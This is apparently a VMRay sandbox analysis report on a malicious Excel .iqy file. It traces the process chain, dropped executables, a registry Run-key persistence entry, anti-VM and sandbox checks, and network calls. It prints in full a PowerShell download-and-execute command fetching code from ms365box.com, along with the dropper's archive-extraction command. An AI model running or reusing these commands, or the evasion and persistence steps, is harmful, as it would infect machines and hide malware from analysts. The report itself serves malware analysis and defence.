VMRay Analyzer Report for Sample #206024
VMRay Analyzer
2.4.0
URI
ms365box.com
Resolved_To
Address
31.202.128.249
URI
localhost
Resolved_To
Resolved_To
Address
0000:0000:0000:0000:0000:0000:0000:0001
Address
127.0.0.1
Process
1
2476
excel.exe
1664
excel.exe
"C:\Program Files\Microsoft Office\Office15\EXCEL.EXE"
C:\Users\aDU0VK IWA5kLS\Desktop\
c:\program files\microsoft office\office15\excel.exe
Child_Of
Process
2
3040
cmd.exe
2476
cmd.exe
CMD.EXE /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -sta -nologo -nop -c IEX ((new-object net.webclient).downloadstring(\"http://ms365box.com/update.2\"))
C:\Users\aDU0VK IWA5kLS\Desktop\
c:\windows\system32\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Opened
Process
3
3064
powershell.exe
3040
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -sta -nologo -nop -c IEX ((new-object net.webclient).downloadstring(\"http://ms365box.com/update.2\"))
C:\Users\aDU0VK IWA5kLS\Desktop\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Read_From
Read_From
Read_From
Read_From
Read_From
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Opened
Read_From
Connected_To
Connected_To
Connected_To
Process
4
1224
total.exe
3064
total.exe
"C:\Users\ADU0VK~1\AppData\Local\Temp\total.exe"
C:\Users\aDU0VK IWA5kLS\Desktop\
c:\users\adu0vk~1\appdata\local\temp\total.exe
Child_Of
Child_Of
Child_Of
Created
Deleted
Deleted
Deleted
Deleted
Created
Created
Created
Created
Created
Created
Created
Modified_Properties_Of
Opened
Opened
Opened
Opened
Opened
Process
5
1108
a.exe
1224
a.exe
A.exe x B.7z -psL3117nTGnp393SLZxZy -o"C:\Users\aDU0VK IWA5kLS\AppData\Roaming" -aoa
C:\Users\ADU0VK~1\AppData\Local\Temp\
c:\users\adu0vk~1\appdata\local\temp\a.exe
Opened
Opened
Opened
Process
6
2192
cmd.exe
1224
cmd.exe
cmd /c start "" "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe"
C:\Users\ADU0VK~1\AppData\Local\Temp\
c:\windows\syswow64\cmd.exe
Child_Of
Created
Opened
Opened
Opened
Opened
Opened
Opened
Process
7
2160
winpoint.exe
2192
winpoint.exe
"C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe"
C:\Users\ADU0VK~1\AppData\Local\Temp\
c:\users\adu0vk iwa5kls\appdata\roaming\winpoint.exe
Created
Process
8
204
cmd.exe
1224
cmd.exe
cmd /c C:\Users\ADU0VK~1\AppData\Local\Temp\1.bat
C:\Users\ADU0VK~1\AppData\Local\Temp\
c:\windows\syswow64\cmd.exe
Child_Of
Deleted
Deleted
Opened
Opened
Opened
Created
Opened
Opened
Opened
Process
9
1836
ping.exe
204
ping.exe
ping localhost -n 2
C:\Users\ADU0VK~1\AppData\Local\Temp\
c:\windows\syswow64\ping.exe
Wrote_To
Opened
Read_From
Read_From
File
STD_OUTPUT_HANDLE
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Policies\Microsoft\Windows\System
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_CURRENT_USER
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
File
STD_INPUT_HANDLE
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
c:\
c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config
config
File
conout$
Mutex
Global\.net clr networking
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
path
ApplicationBase
StackVersion
StackVersion
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
System
INVALID
WinRegistryKey
System\PowerShell
INVALID
WinRegistryKey
Windows PowerShell
INVALID
WinRegistryKey
Windows PowerShell\PowerShell
INVALID
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
HKEY_CURRENT_USER
DNSRecord
ms365box.com
SocketAddress
ms365box.com
80
NetworkConnection
HTTP
ms365box.com
80
URI
ms365box.com/update.2
Contains
URI
None
URI
ms365box.com/inv
Contains
File
users\adu0vk~1\appdata\local\temp\nsdfd9f.tmp
users\adu0vk~1\appdata\local\temp\nsdfd9f.tmp
c:\
c:\users\adu0vk~1\appdata\local\temp\nsdfd9f.tmp
tmp
File
users\adu0vk~1\appdata\local\temp\nstfdb0.tmp
users\adu0vk~1\appdata\local\temp\nstfdb0.tmp
c:\
c:\users\adu0vk~1\appdata\local\temp\nstfdb0.tmp
tmp
File
users\adu0vk~1\appdata\local\temp\nstfdb0.tmp\nsexec.dll
users\adu0vk~1\appdata\local\temp\nstfdb0.tmp\nsexec.dll
c:\
c:\users\adu0vk~1\appdata\local\temp\nstfdb0.tmp\nsexec.dll
dll
File
users\adu0vk~1\appdata\local\temp\nstfdb0.tmp\userinfo.dll
users\adu0vk~1\appdata\local\temp\nstfdb0.tmp\userinfo.dll
c:\
c:\users\adu0vk~1\appdata\local\temp\nstfdb0.tmp\userinfo.dll
dll
File
users\adu0vk~1\appdata\local\temp\total.exe
users\adu0vk~1\appdata\local\temp\total.exe
c:\
c:\users\adu0vk~1\appdata\local\temp\total.exe
exe
File
users\adu0vk~1\appdata\local\temp
users\adu0vk~1\appdata\local\temp
c:\
c:\users\adu0vk~1\appdata\local\temp
File
users
users
c:\
c:\users
File
users\adu0vk~1
users\adu0vk~1
c:\
c:\users\adu0vk~1
File
users\adu0vk~1\appdata
users\adu0vk~1\appdata
c:\
c:\users\adu0vk~1\appdata
File
users\adu0vk~1\appdata\local
users\adu0vk~1\appdata\local
c:\
c:\users\adu0vk~1\appdata\local
Mutex
Name
WinRegistryKey
Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER
Restore
C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe
REG_SZ
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SysTracer
HKEY_LOCAL_MACHINE
WinRegistryKey
HARDWARE\DESCRIPTION\System\BIOS
HKEY_LOCAL_MACHINE
SystemProductName
WinRegistryKey
SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
HKEY_LOCAL_MACHINE
Device Description
WinRegistryKey
SYSTEM\ControlSet001\services\Disk\Enum
HKEY_LOCAL_MACHINE
0
WinRegistryKey
SOFTWARE\VMware, Inc.\VMware Tools
HKEY_LOCAL_MACHINE
File
STD_INPUT_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_ERROR_HANDLE
File
STD_OUTPUT_HANDLE
File
STD_INPUT_HANDLE
File
STD_ERROR_HANDLE
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_CURRENT_USER
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
File
users\adu0vk~1\appdata\local\temp\*(jigfodhy8t9ij3g89eiw
users\adu0vk~1\appdata\local\temp\*(jigfodhy8t9ij3g89eiw
c:\
c:\users\adu0vk~1\appdata\local\temp\*(jigfodhy8t9ij3g89eiw
File
users\adu0vk~1\appdata\local\temp\total.exe
users\adu0vk~1\appdata\local\temp\total.exe
c:\
c:\users\adu0vk~1\appdata\local\temp\total.exe
exe
File
users\adu0vk~1\appdata\local\temp\1.bat
users\adu0vk~1\appdata\local\temp\1.bat
c:\
c:\users\adu0vk~1\appdata\local\temp\1.bat
bat
File
STD_OUTPUT_HANDLE
File
STD_INPUT_HANDLE
File
STD_ERROR_HANDLE
File
\device\null
File
STD_OUTPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
HKEY_LOCAL_MACHINE
DefaultTTL
DNSRecord
localhost
DNSRecord
localhost
Analyzed Sample #206024
Malware Artifacts
206024
Sample-ID: #206024
Job-ID: #274092
This sample was analyzed by VMRay Analyzer 2.4.0 on a Windows 7 system
100
VTI Score based on VTI Database Version 3.0
Metadata of Sample File #206024
Submission-ID: #294060
76917b219ad5a1ff8229a75eb23c34a9ad1ce98264257d3cca538ac59c49a15f.iqy
iqy
MD5
8292efeed21c16d4833e2933a41fab82
SHA1
4ae82c4536463c25b31736503308b32f5a42ff59
SHA256
76917b219ad5a1ff8229a75eb23c34a9ad1ce98264257d3cca538ac59c49a15f
Opened_By
Metadata of Analysis for Job-ID #274092
Timeout
AUFDDCNTXWT
win7_64_sp1-mso2013
AUFDDCNTXWT
False
x86 64-bit
True
Windows 7
6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa)
263.948
aDU0VK IWA5kLS
This is a property collection for additional information of VMRay analysis
VMRay Analyzer
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".
Creates process
Network
VTI rule match with VTI rule score 3/5
vmray_request_dns_by_name
Resolves host name "ms365box.com".
Performs DNS request
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process "C:\Users\ADU0VK~1\AppData\Local\Temp\total.exe".
Creates process
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "Global\.net clr networking".
Creates system object
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "Name".
Creates system object
Anti Analysis
VTI rule match with VTI rule score 2/5
vmray_detect_debugger_by_api
Check via API "IsDebuggerPresent".
Tries to detect debugger
Anti Analysis
VTI rule match with VTI rule score 5/5
vmray_detect_generic_vm_by_registry
Reads out system information, commonly used to detect VMs via registry. (Value "SystemProductName" in key "HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\BIOS").
Tries to detect virtual machine
Anti Analysis
VTI rule match with VTI rule score 5/5
vmray_detect_vmware_by_registry
Possibly trying to detect VMware via registry "HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware Tools".
Tries to detect virtual machine
Anti Analysis
VTI rule match with VTI rule score 5/5
vmray_detect_application_sandbox_by_dll
Possibly trying to detect "Threadexpert" by checking for existence of module "dbghelp.dll".
Tries to detect application sandbox
Anti Analysis
VTI rule match with VTI rule score 5/5
vmray_detect_application_sandbox_by_dll
Possibly trying to detect "SunBelt Sandbox" by checking for existence of module "pstorec.dll".
Tries to detect application sandbox
Anti Analysis
VTI rule match with VTI rule score 5/5
vmray_detect_application_sandbox_by_dll
Possibly trying to detect "Virtual PC" by checking for existence of module "vmcheck.dll".
Tries to detect application sandbox
Anti Analysis
VTI rule match with VTI rule score 5/5
vmray_detect_forensic_tool_by_module
Tries to detect forensic tools by checking if the DLL "SunBelt Sandbox" exists.
Tries to detect a forensic tool
Anti Analysis
VTI rule match with VTI rule score 5/5
vmray_detect_application_sandbox_by_dll
Possibly trying to detect "SunBelt Sandbox" by checking for existence of module "api_log.dll".
Tries to detect application sandbox
Anti Analysis
VTI rule match with VTI rule score 5/5
vmray_detect_forensic_tool_by_module
Tries to detect forensic tools by checking if the DLL "Winsock Packet Editor" exists.
Tries to detect a forensic tool
Anti Analysis
VTI rule match with VTI rule score 5/5
vmray_detect_application_sandbox_by_dll
Possibly trying to detect "Sandboxie" by checking for existence of module "SbieDll.dll".
Tries to detect application sandbox
Anti Analysis
VTI rule match with VTI rule score 5/5
vmray_detect_application_sandbox_by_dll
Possibly trying to detect "SunBelt Sandbox" by checking for existence of module "dir_watch.dll".
Tries to detect application sandbox
Anti Analysis
VTI rule match with VTI rule score 5/5
vmray_detect_application_sandbox_by_dll
Possibly trying to detect "Comodo Sandbox" by checking for existence of module "cmdvrt32.dll".
Tries to detect application sandbox
Anti Analysis
VTI rule match with VTI rule score 5/5
vmray_detect_virtualbox_by_module
Possibly trying to detect VirtualBox via module "VBoxHook.dll".
Tries to detect virtual machine
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process "A.exe x B.7z -psL3117nTGnp393SLZxZy -o"C:\Users\aDU0VK IWA5kLS\AppData\Roaming" -aoa".
Creates process
Persistence
VTI rule match with VTI rule score 3/5
vmray_install_startup_script_by_registry
Adds "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe" to Windows startup via registry.
Installs system startup script or application
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process "cmd /c start "" "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe"".
Creates process
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe".
Creates process
Network
VTI rule match with VTI rule score 3/5
vmray_request_dns_by_name
Resolves host name "localhost".
Performs DNS request
File System
VTI rule match with VTI rule score 4/5
vmray_handle_with_malicious_files
File "C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe" is a known malicious file.
Known malicious file
File System
VTI rule match with VTI rule score 4/5
vmray_handle_with_malicious_files
File "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe" is a known malicious file.
Known malicious file
Network
VTI rule match with VTI rule score 2/5
vmray_reputation_url_malicious
URL "http://ms365box.com/update.2" is known as malicious URL.
Associated with known malicious/suspicious URLs
Network
VTI rule match with VTI rule score 2/5
vmray_reputation_url_malicious
URL "http://ms365box.com/inv" is known as malicious URL.
Associated with known malicious/suspicious URLs
Network
VTI rule match with VTI rule score 2/5
vmray_reputation_url_malicious
URL "ms365box.com" is known as malicious URL.
Associated with known malicious/suspicious URLs
Network
VTI rule match with VTI rule score 2/5
vmray_reputation_url_malicious
URL "http://ms365box.com/" is known as malicious URL.
Associated with known malicious/suspicious URLs
Network
VTI rule match with VTI rule score 2/5
vmray_reputation_url_malicious
URL "http://ms365box.com/update.1" is known as malicious URL.
Associated with known malicious/suspicious URLs
Network
VTI rule match with VTI rule score 4/5
vmray_download_data_http_request
URL "http://ms365box.com/update.2".
Downloads data
Network
VTI rule match with VTI rule score 4/5
vmray_download_data_http_request
URL "http://ms365box.com/inv".
Downloads data
Network
VTI rule match with VTI rule score 2/5
establish_http_connection
URL "ms365box.com/update.2".
Connects to HTTP server
Network
VTI rule match with VTI rule score 2/5
establish_http_connection
URL "ms365box.com/inv".
Connects to HTTP server
PE
VTI rule match with VTI rule score 1/5
vmray_check_for_packed_pe_file
File "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe" is packed with "Armadillo v1.71".
The PE file was created with a packer
PE
VTI rule match with VTI rule score 2/5
vmray_drop_pe_file
Drops file "C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe".
Drops PE file
PE
VTI rule match with VTI rule score 2/5
vmray_drop_pe_file
Drops file "C:\Users\ADU0VK~1\AppData\Local\Temp\nstFDB0.tmp\System.dll".
Drops PE file
PE
VTI rule match with VTI rule score 2/5
vmray_drop_pe_file
Drops file "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe".
Drops PE file
PE
VTI rule match with VTI rule score 3/5
vmray_execute_dropped_pe_file
Executes dropped file "C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\total.exe".
Executes dropped PE file
PE
VTI rule match with VTI rule score 3/5
vmray_execute_dropped_pe_file
Executes dropped file "C:\Users\aDU0VK IWA5kLS\AppData\Roaming\winpoint.exe".
Executes dropped PE file